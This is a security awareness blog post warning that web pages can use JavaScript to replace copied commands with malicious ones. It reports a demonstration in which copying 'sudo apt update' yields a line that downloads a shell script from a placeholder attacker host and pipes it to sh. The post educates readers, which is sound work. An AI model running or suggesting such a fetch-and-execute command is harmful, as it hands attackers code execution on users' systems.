Be careful when Copying Code from Web sites

Programmers, Sysadmins, security researchers and technology lovers and I often Copy-Paste the configuration and installation commands, the Web sites give quick instructions, instead of having to retype each command. However, this action is warned that it is dangerous and can cause the system to be hacked because when Copy is one command but Paste is another command.

A security expert has performed a simple trick that will make you think twice before copying and pasting any commands from untrusted websites.

Be careful when Copying Code from other Websites - you can get Hacked

Vulnerability from Clipboard – clipboard

Recently, Gabriel Friedlander, founder of the Wizer platform, which specializes in security awareness training, tested a simple but surprising hack that will make you cautious when copying commands from websites.

Copying frequently used commands from a website (ahem, StackOverflow) and pasting them into a command line tool (terminal) like CMD Windows or Terminal Linux is very familiar to novice programmers or lazy people like me.

But Friedlander warns a web page can secretly replace the content of what’s on your Clipboard, and what’s actually copied to your clipboard will be vastly different from what you intended. Copy.

Worse yet, without the necessary checks, programmers may only realize their mistake after pasting the text, by which time it may be too late.

You can try this hack at https://www.wizer-training.com/blog/copy-paste.

Try copying the line on the web page, then paste it in notepad or anywhere.

hack copy paste

You will see results that are not sudo apt update which is

curl http://attacker-domain:8000/shell.sh | sh

Many people think that they are copying a Linux system Update command, seemingly harmless, but actually in the clipboard is storing the command to load shell.sh and execute it after the download is complete.

People pasting text may have the impression that they are copying update the familiar, harmless sudo apt command used to fetch updates on software installed on your system.

Actually, when you view-source Website, you will see that there is a javascript snippet that changes content when you execute the Copy command from that website.

To overcome this situation, you can use some javascript blocking extensions on Chrome such as: ScriptBlock, Disable JavaScript, Toggle JavaScript … but if you use this, when you go to some websites using javascript, there will be display errors. It’s best when copying something, paste it in notepad before checking if it’s correct, then paste it in Terminal.

Leave a Reply